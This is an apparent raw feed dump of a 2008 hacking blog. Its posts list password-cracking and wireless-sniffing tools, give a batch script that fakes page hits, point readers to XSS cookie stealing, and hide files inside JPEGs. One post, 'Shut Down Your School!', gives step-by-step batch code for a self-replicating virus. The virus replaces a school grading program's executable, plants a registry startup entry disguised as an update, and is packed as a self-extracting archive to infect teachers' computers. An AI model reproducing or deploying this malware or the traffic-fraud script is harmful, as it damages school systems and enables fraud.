=&quot;4027562844&quot;; google_color_border = &quot;FFFFFF&quot;; google_color_bg = &quot;FFFFFF&quot;; google_color_link = &quot;df6f0b&quot;; google_color_url = &quot;df6f0b&quot;; google_color_text = &quot;000000&quot;; //--&gt;&lt;b&gt;10. PuTTY&lt;/b&gt;&lt;/p&gt; &lt;p&gt;PuTTY is a free implementation of Telnet and SSH for Win32 and Unix platforms, along with an xterm terminal emulator. A must have for any h4×0r wanting to telnet or SSH from Windows without having to use the crappy default MS command line clients.&lt;/p&gt; &lt;p&gt;&lt;a href=&quot;http://www.chiark.greenend.org.uk/%7Esgtatham/putty/&quot;&gt;Get PuTTY Here&lt;/a&gt;.&lt;/p&gt; &lt;p&gt;&lt;b&gt;11. LCP&lt;/b&gt;&lt;/p&gt; &lt;p&gt;Main purpose of LCP program is user account passwords auditing and recovery in Windows NT/2000/XP/2003. Accounts information import, Passwords recovery, Brute force session distribution, Hashes computing.&lt;/p&gt; &lt;p&gt;A good free alternative to L0phtcrack.&lt;/p&gt; &lt;p&gt;LCP was briefly mentioned in our well read &lt;a href=&quot;http://www.darknet.org.uk/2006/02/password-cracking-with-rainbowcrack-and-rainbow-tables/&quot;&gt;Rainbow Tables and RainbowCrack&lt;/a&gt; article.&lt;/p&gt; &lt;p&gt;&lt;a href=&quot;http://www.lcpsoft.com/english/download.htm&quot;&gt;Get LCP Here&lt;/a&gt;&lt;/p&gt; &lt;p&gt;&lt;b&gt;12. Cain and Abel&lt;/b&gt;&lt;/p&gt; &lt;p&gt;My personal favourite for password cracking of any kind.&lt;/p&gt; &lt;p&gt;Cain &amp;amp; Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols. The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort.&lt;/p&gt; &lt;p&gt;&lt;a href=&quot;http://www.oxid.it/cain.html&quot;&gt;Get Cain and Abel Here&lt;/a&gt;&lt;/p&gt; &lt;p&gt;&lt;b&gt;13. Kismet&lt;/b&gt;&lt;/p&gt; &lt;p&gt;Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and can sniff 802.11b, 802.11a, and 802.11g traffic.&lt;/p&gt; &lt;p&gt;A good wireless tool as long as your card supports rfmon (look for an orinocco gold).&lt;/p&gt; &lt;p&gt;&lt;a href=&quot;http://www.kismetwireless.net/download.shtml&quot;&gt;Get Kismet Here&lt;/a&gt;&lt;/p&gt; &lt;p&gt;&lt;b&gt;14. NetStumbler&lt;/b&gt;&lt;/p&gt; &lt;p&gt;Yes a decent wireless tool for Windows! Sadly not as powerful as it’s Linux counterparts, but it’s easy to use and has a nice interface, good for the basics of war-driving.&lt;/p&gt; &lt;p&gt;NetStumbler is a tool for Windows that allows you to detect Wireless Local Area Networks (WLANs) using 802.11b, 802.11a and 802.11g. It has many uses:&lt;/p&gt; &lt;ul&gt;&lt;li&gt;Verify that your network is set up the way you intended.&lt;/li&gt;&lt;li&gt;Find locations with poor coverage in your WLAN.&lt;/li&gt;&lt;li&gt;Detect other networks that may be causing interference on your network.&lt;/li&gt;&lt;li&gt;Detect unauthorized “rogue” access points in your workplace.&lt;/li&gt;&lt;li&gt;Help aim directional antennas for long-haul WLAN links.&lt;/li&gt;&lt;li&gt;Use it recreationally for WarDriving.&lt;/li&gt;&lt;/ul&gt; &lt;p&gt;&lt;a href=&quot;http://www.stumbler.net/&quot;&gt;Get NetStumbler Here&lt;/a&gt;&lt;/p&gt; &lt;p&gt;&lt;b&gt;15. hping&lt;/b&gt;&lt;/p&gt; &lt;p&gt;To finish off, something a little more advanced if you want to test your TCP/IP packet monkey skills.&lt;/p&gt; &lt;p&gt;hping is a command-line oriented TCP/IP packet assembler/analyzer. The interface is inspired to the ping unix command, but hping isn’t only able to send ICMP echo requests. It supports TCP, UDP, ICMP and RAW-IP protocols, has a traceroute mode, the ability to send files between a covered channel, and many other features.&lt;/p&gt; &lt;p&gt;&lt;a href=&quot;http://www.hping.org/&quot;&gt;Get hping Here&lt;/a&gt;&lt;/p&gt; &lt;p&gt;&lt;b&gt;Source:&lt;/b&gt;http://www.darknet.org.uk/2006/04/top-15-securityhacking-tools-utilities/&lt;/p&gt; &lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;blogger-post-footer&quot;&gt;&lt;!-- Begin BidVertiser Referral code --&gt;
  23. &lt;script language=&quot;JavaScript&quot;&gt;var bdv_ref_pid=229521;var bdv_ref_type=&#39;i&#39;;var bdv_ref_option=&#39;a&#39;;var bdv_ref_eb=&#39;0&#39;;var bdv_ref_gif_id=&#39;ref_110x32_black&#39;;var bdv_ref_width=110;var bdv_ref_height=32;&lt;/script&gt;
  24. &lt;script language=&quot;JavaScript&quot; src=&quot;http://srv.bidvertiser.com/bidvertiser/referral_button.html?pid=229521&quot;&gt;&lt;/script&gt;
  25. &lt;noscript&gt;&lt;a href=&quot;http://www.bidvertiser.com&quot;&gt;make money online&lt;/a&gt;&lt;/noscript&gt;
  26. &lt;!-- End BidVertiser Referral code --&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://dracohacker.blogspot.com/feeds/4563822574082606771/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1548743946762923955&amp;postID=4563822574082606771' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1548743946762923955/posts/default/4563822574082606771'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1548743946762923955/posts/default/4563822574082606771'/><link rel='alternate' type='text/html' href='http://dracohacker.blogspot.com/2008/11/top-15-hacking-software-and-my.html' title='Top 15 Hacking Software And My Favorites'/><author><name>Shubham</name><uri>http://www.blogger.com/profile/11784649078387709212</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='29' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7JIriCfpaHWKXProHy89QTvm2uEJ8j7ooxwom2b-f3gqjM3ScgCHGQjOXyUZjZbjus0Tq_mPYeDxZtNyB-TnjTMWwCH_naBIOcDTW4DCqsf_kV2662mKxzvQeudxf/s220/hacker1.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1548743946762923955.post-5738301748313557457</id><published>2008-11-29T00:17:00.000-08:00</published><updated>2008-11-29T00:19:41.005-08:00</updated><title type='text'>Small Hack For Orkut</title><content type='html'>&lt;p&gt;&lt;a href=&quot;http://orkut.com/&quot; target=&quot;_blank&quot;&gt;Orkut&lt;/a&gt; a very famous social networking site has an option called scrapbook. Now for those people who scrap many times a minute, here is a hack:&lt;/p&gt; &lt;p&gt;If you are using firefox, &lt;a href=&quot;https://addons.mozilla.org/firefox/2579/&quot; target=&quot;_blank&quot;&gt;Install this script&lt;/a&gt; (addon) and it will allow you to scrap back just in one click rather than the traditional 2 step + 1 click scrapping. This not only saves time, but also helps you keep things contextual.&lt;/p&gt; &lt;p&gt;Screenshot (click to enlarge):&lt;br /&gt;&lt;a href=&quot;http://bothack.files.wordpress.com/2006/06/orkut.png&quot; class=&quot;imagelink&quot; title=&quot;orkut&quot;&gt;&lt;img src=&quot;http://bothack.files.wordpress.com/2006/06/orkut.png?w=240&amp;amp;h=151&amp;amp;h=151&quot; alt=&quot;orkut&quot; width=&quot;240&quot; height=&quot;151&quot; /&gt;&lt;/a&gt;&lt;/p&gt; &lt;p&gt;Another reason to shift to firefox &lt;img src=&quot;http://bothack.wordpress.com/wp-includes/images/smilies/icon_smile.gif&quot; alt=&quot;)&quot; class=&quot;wp-smiley&quot; /&gt; works with all versions of firefox.&lt;/p&gt;&lt;div class=&quot;blogger-post-footer&quot;&gt;&lt;!-- Begin BidVertiser Referral code --&gt;
  27. &lt;script language=&quot;JavaScript&quot;&gt;var bdv_ref_pid=229521;var bdv_ref_type=&#39;i&#39;;var bdv_ref_option=&#39;a&#39;;var bdv_ref_eb=&#39;0&#39;;var bdv_ref_gif_id=&#39;ref_110x32_black&#39;;var bdv_ref_width=110;var bdv_ref_height=32;&lt;/script&gt;
  28. &lt;script language=&quot;JavaScript&quot; src=&quot;http://srv.bidvertiser.com/bidvertiser/referral_button.html?pid=229521&quot;&gt;&lt;/script&gt;
  29. &lt;noscript&gt;&lt;a href=&quot;http://www.bidvertiser.com&quot;&gt;make money online&lt;/a&gt;&lt;/noscript&gt;
  30. &lt;!-- End BidVertiser Referral code --&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://dracohacker.blogspot.com/feeds/5738301748313557457/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1548743946762923955&amp;postID=5738301748313557457' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1548743946762923955/posts/default/5738301748313557457'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1548743946762923955/posts/default/5738301748313557457'/><link rel='alternate' type='text/html' href='http://dracohacker.blogspot.com/2008/11/small-hack-for-orkut.html' title='Small Hack For Orkut'/><author><name>Shubham</name><uri>http://www.blogger.com/profile/11784649078387709212</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='29' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7JIriCfpaHWKXProHy89QTvm2uEJ8j7ooxwom2b-f3gqjM3ScgCHGQjOXyUZjZbjus0Tq_mPYeDxZtNyB-TnjTMWwCH_naBIOcDTW4DCqsf_kV2662mKxzvQeudxf/s220/hacker1.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1548743946762923955.post-386154171322413497</id><published>2008-11-29T00:16:00.002-08:00</published><updated>2008-11-29T00:17:20.998-08:00</updated><title type='text'>Page hits flooder</title><content type='html'>&lt;p&gt;This small program can flood ur page hits.&lt;/p&gt; &lt;p&gt;but you have to dedicate one browser for it.. like internet explorer&lt;br /&gt;&lt;b&gt;&lt;u&gt;method:&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;make a batch file with these lines&lt;/p&gt; &lt;p&gt;&lt;i&gt;@echo off&lt;br /&gt;:1&lt;br /&gt;start C:\Progra~1\Intern~1\iexplore.exe “&lt;a href=&quot;http://yoursite.com/&quot; target=&quot;_blank&quot;&gt;http://yoursite.com&lt;/a&gt;“&lt;br /&gt;ping -n &lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;10&lt;/span&gt; 127.0.0.1 &gt;nul&lt;br /&gt;taskkill.exe /im iexplore.exe&lt;br /&gt;goto 1&lt;/i&gt;&lt;/p&gt; &lt;p&gt;depending upon your net speed u may increase the &lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;10&lt;/span&gt; secs time wait&lt;/p&gt; &lt;p&gt;with 10 sec time u may have 360 hits in an hour&lt;br /&gt;with 5 sec time u may have 720 hits in an hour&lt;/p&gt;&lt;div class=&quot;blogger-post-footer&quot;&gt;&lt;!-- Begin BidVertiser Referral code --&gt;
  31. &lt;script language=&quot;JavaScript&quot;&gt;var bdv_ref_pid=229521;var bdv_ref_type=&#39;i&#39;;var bdv_ref_option=&#39;a&#39;;var bdv_ref_eb=&#39;0&#39;;var bdv_ref_gif_id=&#39;ref_110x32_black&#39;;var bdv_ref_width=110;var bdv_ref_height=32;&lt;/script&gt;
  32. &lt;script language=&quot;JavaScript&quot; src=&quot;http://srv.bidvertiser.com/bidvertiser/referral_button.html?pid=229521&quot;&gt;&lt;/script&gt;
  33. &lt;noscript&gt;&lt;a href=&quot;http://www.bidvertiser.com&quot;&gt;make money online&lt;/a&gt;&lt;/noscript&gt;
  34. &lt;!-- End BidVertiser Referral code --&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://dracohacker.blogspot.com/feeds/386154171322413497/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1548743946762923955&amp;postID=386154171322413497' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1548743946762923955/posts/default/386154171322413497'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1548743946762923955/posts/default/386154171322413497'/><link rel='alternate' type='text/html' href='http://dracohacker.blogspot.com/2008/11/page-hits-flooder_29.html' title='Page hits flooder'/><author><name>Shubham</name><uri>http://www.blogger.com/profile/11784649078387709212</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='29' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7JIriCfpaHWKXProHy89QTvm2uEJ8j7ooxwom2b-f3gqjM3ScgCHGQjOXyUZjZbjus0Tq_mPYeDxZtNyB-TnjTMWwCH_naBIOcDTW4DCqsf_kV2662mKxzvQeudxf/s220/hacker1.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1548743946762923955.post-8294875333017856129</id><published>2008-11-29T00:16:00.001-08:00</published><updated>2008-11-29T00:16:31.944-08:00</updated><title type='text'>Website Hacking</title><content type='html'>&lt;div class=&quot;entry&quot;&gt; &lt;div class=&quot;snap_preview&quot;&gt;&lt;div class=&quot;entry&quot;&gt; Note: This is for Average Hackerz, Not Newbies&lt;/div&gt;  &lt;div class=&quot;entry&quot;&gt;This article was taken from http://www.ifinityexists.com&lt;/div&gt;  &lt;div class=&quot;entry&quot;&gt;we are explaining the website attack known as Cross-Site Scripting (XSS). Cross-Site Scripting is a type of security vulnerability that affects web applications that do not sanitize user input properly. This kind of vulnerability allows an “attacker” to inject HTML or client side script like JavaScript into the website. Cross-Site Scripting is most commonly used to steal cookies. Cookies are used for authenticating, tracking, and maintaining specific information about users; therefore, by stealing a user’s cookies an attacker could bypass the website’s access control. There are three types of XSS attacks: Persistent, Non-Persistent, and DOM-Based. In this episode we will cover Persistent and Non-Persistent Cross-Site Scripting attacks.Live Stream &lt;a href=&quot;http://infinityexists.com/videos/episode13/&quot;&gt;Here&lt;/a&gt;&lt;br /&gt;Download &lt;a href=&quot;http://infinityexists.com/wmv/Ep.%2013%20-%20Website%20Hacking%20-%20XSS.wmv&quot;&gt;Here&lt;/a&gt; &lt;p&gt;Download Cookie Catcher &lt;a href=&quot;http://infinityexists.com/downloads/cookie&quot;&gt;Here&lt;/a&gt;&lt;/p&gt;&lt;/div&gt;  &lt;div class=&quot;entry&quot;&gt;Get a md5 password hasher, to decrypt the hash&lt;/div&gt; &lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;blogger-post-footer&quot;&gt;&lt;!-- Begin BidVertiser Referral code --&gt;
  35. &lt;script language=&quot;JavaScript&quot;&gt;var bdv_ref_pid=229521;var bdv_ref_type=&#39;i&#39;;var bdv_ref_option=&#39;a&#39;;var bdv_ref_eb=&#39;0&#39;;var bdv_ref_gif_id=&#39;ref_110x32_black&#39;;var bdv_ref_width=110;var bdv_ref_height=32;&lt;/script&gt;
  36. &lt;script language=&quot;JavaScript&quot; src=&quot;http://srv.bidvertiser.com/bidvertiser/referral_button.html?pid=229521&quot;&gt;&lt;/script&gt;
  37. &lt;noscript&gt;&lt;a href=&quot;http://www.bidvertiser.com&quot;&gt;make money online&lt;/a&gt;&lt;/noscript&gt;
  38. &lt;!-- End BidVertiser Referral code --&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://dracohacker.blogspot.com/feeds/8294875333017856129/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1548743946762923955&amp;postID=8294875333017856129' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1548743946762923955/posts/default/8294875333017856129'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1548743946762923955/posts/default/8294875333017856129'/><link rel='alternate' type='text/html' href='http://dracohacker.blogspot.com/2008/11/website-hacking_29.html' title='Website Hacking'/><author><name>Shubham</name><uri>http://www.blogger.com/profile/11784649078387709212</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='29' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7JIriCfpaHWKXProHy89QTvm2uEJ8j7ooxwom2b-f3gqjM3ScgCHGQjOXyUZjZbjus0Tq_mPYeDxZtNyB-TnjTMWwCH_naBIOcDTW4DCqsf_kV2662mKxzvQeudxf/s220/hacker1.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1548743946762923955.post-6643618707925968568</id><published>2008-11-29T00:15:00.000-08:00</published><updated>2008-11-29T00:16:02.667-08:00</updated><title type='text'>Hide Your Files In a JPEG</title><content type='html'>&lt;div class=&quot;entry&quot;&gt; &lt;div class=&quot;snap_preview&quot;&gt;&lt;p&gt;Well, did you know you could hide your files in a JPEG file? For this, you will only need to download WinRAR. You just need to have a little knowledge about Command Prompt and have WinRAR installed.&lt;/p&gt; &lt;p&gt;Ok, lets begin…&lt;/p&gt; &lt;p&gt;1. Gather all the files that you wish to hide in a folder anywhere in your PC (make it in C:\hidden - RECOMMENDED).&lt;/p&gt; &lt;p&gt;2. Now, add those files in a RAR archive (e.g. secret.rar). This file should also be in the same directory (C:\hidden).&lt;/p&gt; &lt;p&gt;3. Now, look for a simple JPEG picture file (e.g. logo.jpg). Copy/Paste that file also in C:\hidden.&lt;/p&gt; &lt;p&gt;4. Now, open Command Prompt (Go to Run and type ‘cmd‘). Make your working directory C:\hidden.&lt;/p&gt; &lt;p&gt;5. Now type: “COPY /b logo.jpg + secret.rar output.jpg” (without quotes) - Now, logo.jpg is the picture you want to show, secret.rar is the file to be hidden, and output.jpg is the file which contains both. &lt;img src=&quot;http://s.wordpress.com/wp-includes/images/smilies/icon_biggrin.gif&quot; alt=&quot;:D&quot; class=&quot;wp-smiley&quot; /&gt; &lt;/p&gt; &lt;p&gt;6. Now, after you have done this, you will see a file output.jpg in C:\hidden. Open it (double-click) and it will show the picture you wanted to show. Now try opening the same file with WinRAR, it will show the hidden archive .&lt;/p&gt; &lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;blogger-post-footer&quot;&gt;&lt;!-- Begin BidVertiser Referral code --&gt;
  39. &lt;script language=&quot;JavaScript&quot;&gt;var bdv_ref_pid=229521;var bdv_ref_type=&#39;i&#39;;var bdv_ref_option=&#39;a&#39;;var bdv_ref_eb=&#39;0&#39;;var bdv_ref_gif_id=&#39;ref_110x32_black&#39;;var bdv_ref_width=110;var bdv_ref_height=32;&lt;/script&gt;
  40. &lt;script language=&quot;JavaScript&quot; src=&quot;http://srv.bidvertiser.com/bidvertiser/referral_button.html?pid=229521&quot;&gt;&lt;/script&gt;
  41. &lt;noscript&gt;&lt;a href=&quot;http://www.bidvertiser.com&quot;&gt;make money online&lt;/a&gt;&lt;/noscript&gt;
  42. &lt;!-- End BidVertiser Referral code --&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://dracohacker.blogspot.com/feeds/6643618707925968568/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1548743946762923955&amp;postID=6643618707925968568' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1548743946762923955/posts/default/6643618707925968568'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1548743946762923955/posts/default/6643618707925968568'/><link rel='alternate' type='text/html' href='http://dracohacker.blogspot.com/2008/11/hide-your-files-in-jpeg_29.html' title='Hide Your Files In a JPEG'/><author><name>Shubham</name><uri>http://www.blogger.com/profile/11784649078387709212</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='29' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7JIriCfpaHWKXProHy89QTvm2uEJ8j7ooxwom2b-f3gqjM3ScgCHGQjOXyUZjZbjus0Tq_mPYeDxZtNyB-TnjTMWwCH_naBIOcDTW4DCqsf_kV2662mKxzvQeudxf/s220/hacker1.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1548743946762923955.post-8356885581527436522</id><published>2008-11-29T00:14:00.000-08:00</published><updated>2008-11-29T00:15:20.264-08:00</updated><title type='text'>Shut Down Your School!</title><content type='html'>&lt;div class=&quot;entry&quot;&gt; &lt;div class=&quot;snap_preview&quot;&gt;&lt;p&gt;By using the following command you can shutdown your school or college by using only Note pad.This is the main command that will be launched upon startup.&lt;br /&gt;Type this in Notepad.&lt;br /&gt;@echo offshutdown.exe -s -t 10 -c&lt;br /&gt;“You have been hacked!”&lt;br /&gt;Save this as shutdown.bat, making sure you choose all files as the filetype.&lt;/p&gt; &lt;p&gt;Step 2&lt;br /&gt;Make it run on StartupThe file you need can be downloaded here:This is just a simple registry file that anyone can create, but I don’t feel like explaining the registry to everyone. It will disguise itself by claiming to be an update for STI.&lt;br /&gt;&lt;a href=&quot;http://www.mutantsrus.com/Update.reg&quot; class=&quot;external&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.mutantsrus.com/Update.reg&lt;/a&gt;&lt;/p&gt; &lt;p&gt;Step 3&lt;br /&gt;Set up the replication systemHere is the code to set up the replicator (the program that allows the virus to reproduce). This simply gets it ready to infect the teachers. ?,$, and ! means that it varies. It depends on what program you are using. To find out how to fill these blank, get on a computer that has access to the server that stores your grading program. ? is the drive letter. $ is any folders and sub folders that contain the main exe for the grading program. ! is the name of the main exe.&lt;/p&gt; &lt;p&gt;Example O:\sti\ssts2\sti.exe?=O$=sti\ssts2!=sti&lt;/p&gt; &lt;p&gt;Here is the code:&lt;/p&gt; &lt;p&gt;@echo offcd C:\move ?:\$\!.exeren C:?.exe real.exeren C:virus.exe !.execd ?:\$move C:\!.exemove C:\shutdown.batmove C:\Update.regexit&lt;/p&gt; &lt;p&gt;Save this as global.bat&lt;/p&gt; &lt;p&gt;Step 4&lt;br /&gt;They grow up so fast — real fast!This script will infect any teacher that uses STI with the shutdown command. The little viral babies will copy themselves to the user’s hard drive and remain there.&lt;/p&gt; &lt;p&gt;@echo offcd C:\WINDOWSEcho STI must update itself, this will only take a few seconds.pauseEcho Please wait while the files install.move ?:\$\shutdown.batmove ?:\$\Update.regmove ?:\$\cure.exemove ?:\$\cure.exemove ?:\$\cure.batmove ?:\$\remove.batEcho Adding information to registry.pausestart regedit.exe Update.regcd ?:\$start real.exeexit&lt;br /&gt;Now this one has to be in exe form. So save it as virus.bat, then compile it in Quick Batch File Compiler. You can get QuickBFC here: QuickBFC and download this file as a template for QuickBFC to work with. Just save the compiled file over this one.&lt;/p&gt; &lt;p&gt;Step 5&lt;br /&gt;The CureThis is a little tool that can fix all damage done by your virus, it works in the same way that the virus works, but works to correct the problem rather than create it.&lt;br /&gt;@echo off&lt;br /&gt;shutdown -acd C:\WINDOWSdel shutdown.bat&lt;/p&gt; &lt;p&gt;Save as cure.bat&lt;/p&gt; &lt;p&gt;@echo offcd ?:\$del !.execd C:\move ?:\$\real.exeren C:\real.exe !.execd ?:\$move C:\?.execd C:\WINDOWS&lt;br /&gt;Now download this file: &lt;a href=&quot;http://www.mutantsrus.com/cure.exe&quot; class=&quot;external&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.mutantsrus.com/cure.exe&lt;/a&gt;&lt;/p&gt; &lt;p&gt;Step 6&lt;br /&gt;The SetupNo it’s not the name of a heist movie. It is simply a SFX file that extracts all the files to their proper places and places the replicator in the STI drive.I am going to use WinRAR to do this. You can get WinRAR here: &lt;a href=&quot;http://www.rarlab.com/&quot; class=&quot;external&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.rarlab.com&lt;/a&gt;. First gather all the files you have made thus far. The files should be shutdown.bat, Update.reg, virus.exe, cure.exe, cure.bat, remove.bat and global.bat. Now select them all and put them in a .rar file. Then open Winrar and go to “tools”, then select “convert archive to SFX”. Click “Advanced SFX Options” In the field labeled Path to Extract, type C:\WINDOWS In the field labeled Run After Extraction, type C:\WINDOWS\global.bat Save the finished file anywhere you want and as any name. To install the virus, just run this program on a computer at school that is connected to the server that has the grading program on it (such as any computer in the Comp Lab.&lt;/p&gt; &lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;blogger-post-footer&quot;&gt;&lt;!-- Begin BidVertiser Referral code --&gt;
  43. &lt;script language=&quot;JavaScript&quot;&gt;var bdv_ref_pid=229521;var bdv_ref_type=&#39;i&#39;;var bdv_ref_option=&#39;a&#39;;var bdv_ref_eb=&#39;0&#39;;var bdv_ref_gif_id=&#39;ref_110x32_black&#39;;var bdv_ref_width=110;var bdv_ref_height=32;&lt;/script&gt;
  44. &lt;script language=&quot;JavaScript&quot; src=&quot;http://srv.bidvertiser.com/bidvertiser/referral_button.html?pid=229521&quot;&gt;&lt;/script&gt;
  45. &lt;noscript&gt;&lt;a href=&quot;http://www.bidvertiser.com&quot;&gt;make money online&lt;/a&gt;&lt;/noscript&gt;
  46. &lt;!-- End BidVertiser Referral code --&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://dracohacker.blogspot.com/feeds/8356885581527436522/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1548743946762923955&amp;postID=8356885581527436522' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1548743946762923955/posts/default/8356885581527436522'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1548743946762923955/posts/default/8356885581527436522'/><link rel='alternate' type='text/html' href='http://dracohacker.blogspot.com/2008/11/shut-down-your-school_29.html' title='Shut Down Your School!'/><author><name>Shubham</name><uri>http://www.blogger.com/profile/11784649078387709212</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='29' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7JIriCfpaHWKXProHy89QTvm2uEJ8j7ooxwom2b-f3gqjM3ScgCHGQjOXyUZjZbjus0Tq_mPYeDxZtNyB-TnjTMWwCH_naBIOcDTW4DCqsf_kV2662mKxzvQeudxf/s220/hacker1.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1548743946762923955.post-3639235339539995360</id><published>2008-11-29T00:13:00.002-08:00</published><updated>2008-11-29T00:14:40.188-08:00</updated><title type='text'>Find IP info using Gmail/Yahoo/Hotmail</title><content type='html'>&lt;div class=&quot;entry&quot;&gt; &lt;div class=&quot;snap_preview&quot;&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;When you recieve an email, you receive more than just the message. The email comes with headers that carry important information that can tell where the email was sent from and possibly who sent it. For that, you would need to find the IP address of the sender. The tutorial below can help you find the IP address of the sender. Note that this will not work if the sender uses anonymous proxy servers.&lt;/b&gt;&lt;/div&gt; &lt;p&gt;&lt;span&gt;&lt;br /&gt;&lt;b&gt;&lt;br /&gt;First of all, the IP address is generally found in the headers enclosed beween square brackets, for instance, [129.130.1.1]&lt;br /&gt;Finding IP address in Gmail&lt;br /&gt;&lt;/b&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt;&lt;br /&gt;1. Log into your Gmail account with your username and password.&lt;br /&gt;2. Open the mail.&lt;br /&gt;3. To display the email headers,&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt; &lt;ul&gt;&lt;li&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt;Click on the inverted triangle beside Reply. Select Show Orginal.&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt; &lt;p&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt;4. manually find the IP address, proceed to 5.&lt;br /&gt;5. Look for Received: from followed by the IP address between square brackets [ ].&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt;Received: from [69.138.30.1] by web4587.mail.***.yahoo.com&lt;/span&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt;&lt;/span&gt;&lt;/p&gt; &lt;p&gt;6. If you find more than one Received: from patterns, select the last one.&lt;br /&gt;7. Track the IP address of the sender&lt;b&gt;&lt;br /&gt;&lt;span style=&quot;color: rgb(255, 0, 0); font-size: 130%;&quot;&gt;&lt;br /&gt;Finding IP address in Yahoo! Mail&lt;/span&gt;&lt;/b&gt;&lt;/p&gt; &lt;p&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt;1. Log into your Yahoo! mail with your username and password.&lt;/span&gt;&lt;/p&gt; &lt;p&gt;2. Click on Inbox or whichever folder you have stored your mail.&lt;/p&gt; &lt;p&gt;3. Open the mail.&lt;/p&gt; &lt;p&gt;4. If you do not see the headers above the mail message, your headers are not displayed. To display the headers,&lt;/p&gt; &lt;ul&gt;&lt;li&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt;Click on Options on the top-right corner&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt;In the Mail Options page, click on General Preferences&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt;Scroll down to Messages where you have the Headers option&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt;Make sure that Show all headers on incoming messages is selected&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt;Click on the Save button&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt;Go back to the mails and open that 